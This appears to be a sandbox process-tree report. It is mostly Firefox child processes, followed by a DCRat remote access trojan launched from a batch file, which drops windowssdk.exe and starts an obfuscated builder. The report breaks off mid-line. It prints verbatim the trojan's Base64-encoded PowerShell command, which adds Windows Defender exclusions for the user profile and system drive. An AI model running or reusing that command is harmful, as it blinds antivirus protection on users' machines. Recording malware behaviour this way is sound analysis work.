    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9260 -childID 26 -isForBrowser -prefsHandle 9272 -prefMapHandle 9292 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {00d4a0d8-a8ca-4ebb-b534-ac1a38179052} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:7120
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9396 -childID 27 -isForBrowser -prefsHandle 9404 -prefMapHandle 9408 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c03f31a4-afb4-4202-a172-5c234548b64a} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:4848
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10084 -childID 28 -isForBrowser -prefsHandle 9984 -prefMapHandle 9988 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8ba46d87-8919-4c75-8075-ebbffd433245} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:5024
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10672 -childID 29 -isForBrowser -prefsHandle 10668 -prefMapHandle 10664 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {25d9fd6f-6c67-4a20-a316-e28d8364c864} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6948
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10936 -childID 30 -isForBrowser -prefsHandle 10812 -prefMapHandle 5968 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49f45487-806e-49f1-91b4-bde44faec9aa} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6020
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11056 -childID 31 -isForBrowser -prefsHandle 11136 -prefMapHandle 11132 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6df5b51b-f573-4329-ae56-0821aa29554d} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:5172
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10848 -childID 32 -isForBrowser -prefsHandle 10856 -prefMapHandle 10860 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb0c4c4a-3c56-4a03-848c-81591af0ec4f} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:5032
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10664 -childID 33 -isForBrowser -prefsHandle 10648 -prefMapHandle 7200 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9df629af-2839-4933-80ca-5dda3acb3d45} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:7076
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11312 -childID 34 -isForBrowser -prefsHandle 11320 -prefMapHandle 11324 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64154b7e-3857-41e3-8e9b-3fbac75d5790} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6364
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6752 -childID 35 -isForBrowser -prefsHandle 11320 -prefMapHandle 11804 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {135cadb2-41ba-4397-b537-eb6a87efa386} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6240
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10248 -childID 36 -isForBrowser -prefsHandle 10096 -prefMapHandle 10100 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1c36d08-a1fc-4f66-8d3f-e740306d1ff7} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:7456
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9120 -childID 37 -isForBrowser -prefsHandle 10184 -prefMapHandle 10108 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ef07d20-0254-4982-a818-fc4864382ae7} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:7464
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9828 -childID 38 -isForBrowser -prefsHandle 10176 -prefMapHandle 10172 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {035a61a3-e6df-4f71-ae0b-ea02fb721b8c} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:7472
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=440 -childID 39 -isForBrowser -prefsHandle 12240 -prefMapHandle 6432 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {31160e21-d3f9-4416-93db-1fb6ec907ba7} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:7032
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12348 -childID 40 -isForBrowser -prefsHandle 11224 -prefMapHandle 6544 -prefsLen 31119 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2197e15-4e38-4b5a-ab57-7658b639e09a} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6816
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4232 -childID 41 -isForBrowser -prefsHandle 5404 -prefMapHandle 12356 -prefsLen 31119 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a9e18bf-4cca-4fe9-bd6f-e7bf5a07ea09} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:6232
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12732 -childID 42 -isForBrowser -prefsHandle 12620 -prefMapHandle 12628 -prefsLen 31119 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f11e1886-dbd1-4282-8adb-137367333628} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:7984
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11928 -childID 43 -isForBrowser -prefsHandle 5788 -prefMapHandle 6752 -prefsLen 31119 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee88a709-2b0a-4014-983b-87b043c31874} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:7308
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7040 -childID 44 -isForBrowser -prefsHandle 10472 -prefMapHandle 9352 -prefsLen 31119 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c888c0c-43a8-444b-b6b3-58d5955166af} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:7384
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7004 -childID 45 -isForBrowser -prefsHandle 5412 -prefMapHandle 9804 -prefsLen 31119 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2a0aa95-3d19-432c-b432-95f1adc4b074} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:1424
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12196 -childID 46 -isForBrowser -prefsHandle 6148 -prefMapHandle 12204 -prefsLen 31119 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02a3e7e3-4ef1-45e0-a763-769f90a75dd9} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:1932
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9692 -childID 47 -isForBrowser -prefsHandle 10000 -prefMapHandle 12312 -prefsLen 31119 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8dfe56a-e3e2-490e-91a0-d9ffe9dad4c8} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:4940
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7068 -childID 48 -isForBrowser -prefsHandle 12312 -prefMapHandle 4736 -prefsLen 31119 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c35cd82-afbe-4e5e-b7a3-a29d7b40e0be} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:2208
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10572 -childID 49 -isForBrowser -prefsHandle 2908 -prefMapHandle 12560 -prefsLen 31119 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7183c5ed-ec0f-4dfd-b563-d8aedcd511c1} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
    3⤵
    PID:8156

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004E0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7208

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3920

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:7644
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:7528
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1816 -parentBuildID 20240401114208 -prefsHandle 1716 -prefMapHandle 1732 -prefsLen 27676 -prefMapSize 245341 -appDir "C:\Program Files\Mozilla Firefox\browser" - {201ca2fa-6a93-4274-94d1-bce22e5dbbb6} 7528 "\\.\pipe\gecko-crash-server-pipe.7528" gpu
    3⤵
    PID:2408
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2208 -parentBuildID 20240401114208 -prefsHandle 2200 -prefMapHandle 2196 -prefsLen 27676 -prefMapSize 245341 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {71572ab2-bdd2-4389-8571-d4e2e175c35b} 7528 "\\.\pipe\gecko-crash-server-pipe.7528" socket
    3⤵
    - Checks processor information in registry
    PID:1080
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3260 -childID 1 -isForBrowser -prefsHandle 3316 -prefMapHandle 3312 -prefsLen 28175 -prefMapSize 245341 -jsInitHandle 1116 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b658ae7c-5180-4001-ae2f-806ac797b25d} 7528 "\\.\pipe\gecko-crash-server-pipe.7528" tab
    3⤵
    PID:5328
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2960 -childID 2 -isForBrowser -prefsHandle 3472 -prefMapHandle 3008 -prefsLen 33408 -prefMapSize 245341 -jsInitHandle 1116 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bbe5af7c-e18b-4e96-a495-e7e91921598a} 7528 "\\.\pipe\gecko-crash-server-pipe.7528" tab
    3⤵
    PID:4204
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4192 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4252 -prefMapHandle 4248 -prefsLen 33408 -prefMapSize 245341 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1842ae1c-3bb1-4621-96c9-deb67fa3ff49} 7528 "\\.\pipe\gecko-crash-server-pipe.7528" utility
    3⤵
    - Checks processor information in registry
    PID:5896
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5280 -childID 3 -isForBrowser -prefsHandle 5272 -prefMapHandle 5256 -prefsLen 30461 -prefMapSize 245341 -jsInitHandle 1116 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3140116c-dd26-4923-abe8-eceace67fbbb} 7528 "\\.\pipe\gecko-crash-server-pipe.7528" tab
    3⤵
    PID:6768
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5288 -childID 4 -isForBrowser -prefsHandle 5424 -prefMapHandle 5428 -prefsLen 30461 -prefMapSize 245341 -jsInitHandle 1116 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {995d1f9f-7b97-4d00-8dd8-1bc1345614c5} 7528 "\\.\pipe\gecko-crash-server-pipe.7528" tab
    3⤵
    PID:3512
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5600 -childID 5 -isForBrowser -prefsHandle 5608 -prefMapHandle 5612 -prefsLen 30461 -prefMapSize 245341 -jsInitHandle 1116 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ea2e0359-547e-43f1-9f40-c36469099fa0} 7528 "\\.\pipe\gecko-crash-server-pipe.7528" tab
    3⤵
    PID:6896

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4516
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:7560
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1824 -parentBuildID 20240401114208 -prefsHandle 1740 -prefMapHandle 1680 -prefsLen 27676 -prefMapSize 245341 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bba259f5-686f-4f29-b90c-08fec8252142} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" gpu
    3⤵
    PID:7464
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2212 -parentBuildID 20240401114208 -prefsHandle 2196 -prefMapHandle 2192 -prefsLen 27676 -prefMapSize 245341 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdaf1ac5-c83a-4aba-b901-369159a26820} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" socket
    3⤵
    - Checks processor information in registry
    PID:7904
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3180 -childID 1 -isForBrowser -prefsHandle 3352 -prefMapHandle 2480 -prefsLen 28175 -prefMapSize 245341 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {35556d59-0e83-4912-bbd8-dedde8d11e40} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" tab
    3⤵
    PID:7220
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2968 -childID 2 -isForBrowser -prefsHandle 2444 -prefMapHandle 3000 -prefsLen 32524 -prefMapSize 245341 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cdf028af-ade3-428a-b55d-6906d57fd933} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" tab
    3⤵
    PID:4804
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4764 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4708 -prefMapHandle 4576 -prefsLen 33462 -prefMapSize 245341 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f76d3a50-283a-4dc8-82ef-578a3fd9def1} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" utility
    3⤵
    - Checks processor information in registry
    PID:2380
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5060 -childID 3 -isForBrowser -prefsHandle 5024 -prefMapHandle 5048 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53613818-68c2-4a52-9c79-ef16524f099f} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" tab
    3⤵
    PID:5828
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5176 -childID 4 -isForBrowser -prefsHandle 5180 -prefMapHandle 5184 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20558758-70e8-4416-be1a-07d843a33522} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" tab
    3⤵
    PID:2484
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5452 -childID 5 -isForBrowser -prefsHandle 5372 -prefMapHandle 5376 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f06a61a9-76ce-4f7b-aef5-a41cb0e8b0c9} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" tab
    3⤵
    PID:6892
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6028 -childID 6 -isForBrowser -prefsHandle 6024 -prefMapHandle 5024 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {92c63f9f-ead8-4ee6-9500-31eeccb1f01e} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" tab
    3⤵
    PID:6460
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4660 -childID 7 -isForBrowser -prefsHandle 5036 -prefMapHandle 5012 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0eb11ad-216e-4220-9116-7fdb60aeb003} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" tab
    3⤵
    PID:6912
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6252 -childID 8 -isForBrowser -prefsHandle 4160 -prefMapHandle 4156 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7199f2a0-309d-42db-866a-ad6deaa6132f} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" tab
    3⤵
    PID:7068
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6456 -childID 9 -isForBrowser -prefsHandle 6508 -prefMapHandle 6504 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c06c769c-1e7b-4bb1-bf29-78f914e4c86d} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" tab
    3⤵
    PID:864
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6688 -parentBuildID 20240401114208 -prefsHandle 6712 -prefMapHandle 6636 -prefsLen 33462 -prefMapSize 245341 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4615b2e8-88a2-42b1-a097-50203925b32a} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" rdd
    3⤵
    PID:5860
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6788 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 6784 -prefMapHandle 6816 -prefsLen 33462 -prefMapSize 245341 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91d4e39c-52de-433f-a0fe-c3a1ada16e46} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" utility
    3⤵
    - Checks processor information in registry
    PID:6196
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5480 -childID 10 -isForBrowser -prefsHandle 5004 -prefMapHandle 5064 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {761941cc-45ea-43f0-986a-d0f1e9f28345} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" tab
    3⤵
    PID:6324
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8028 -childID 11 -isForBrowser -prefsHandle 6920 -prefMapHandle 6268 -prefsLen 30458 -prefMapSize 245341 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b440856a-b8bc-4537-8835-e878dbddaa51} 7560 "\\.\pipe\gecko-crash-server-pipe.7560" tab
    3⤵
    PID:6448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\dcrat\123.bat" "
1⤵
PID:7192
- C:\Users\Admin\Downloads\dcrat\DCRat.exe
  DCRat.exe
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:5724
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAagBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAZgBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAcQBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAeABpACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2092
- - C:\Windows\windowssdk.exe
    "C:\Windows\windowssdk.exe"
    3⤵
    - Server Software Component: Terminal Services DLL
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Windows directory
    PID:8156
- - C:\Users\Admin\Downloads\dcrat\DCRatBuilder.exe
    "C:\Users\Admin\Downloads\dcrat\DCRatBuilder.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:7012
  - - C:\Program Files\Java\jre-1.8\bin\javaw.exe
      "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -Dprism.dirtyopts=false -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\IIIllllIlIlllIlIIIIlllIlIlIlllllIIIlIIllllIIIlIllIIlIIllllIIllllllIIlIIIIIIlllIIIlIllllllIIllIlIllIlllIllIlIIIIIIIIllllI.jar;lib\IIIllllIlIlllIlIIIIlllIlIlIlllllIIIlIIllllIIIlIllIIlIIllllIIllllllIIlIIIIIIlllIIIlIllllllIIllIlIllIlllIllIlIIIIIIIIllllIIilIl.jar;lib\IIlIlIllIIlIIllIIllIIlIIIllIlIlIlIIIIlIlIllIIlIIllIIIIIllIIIIlIIIlIIlIIlIIlIllIIlllIIIllIIIlIIlIllllIllIIIIlIIIlIllllllI.jar;lib\IlIIlIllllIIIIIlIlllIllIlIlIIIIIlIIIlIlIlllIIllIllIIIIIIlIIlllIIIlIIIlllIIIlllllIlIlIlllllIIlIllIIlIIlIIlIIIlllllllIlIII.jar;lib\IlIlIIIIIIIlIlllllllIllIIlIIllIllllIIIlIIIlIlIIlIIlIIlIllIlllIlIlIIllIIlIIIIIIIlIIIIIIIIIlIlllIIllIlIIlIIIlIlIlllIIIIIIl.jar;lib\IlIllIIllllllllIlIIlllllIIIIllIIIlIIlllIIllIIllllIIllIlIIIlIIIIlIIIIIlllllllIllIIlIlIllIIlIlIlIIllIlIllIIIlIIIIlIllIIIIl.jar;lib\IllIIIIllIlIIIIlIlIllIIlIIllIIlIllIIlllllIlllIllIlIIlIIlllIIlIlIlIllIllIIlIIIlIIIllIIIIIllIIlllllIlIIIIIlIIIIIIIIIIIIlII.jar;lib\lIIllIIlIlllIlIlllIlIIlIIIlllllIIlIlII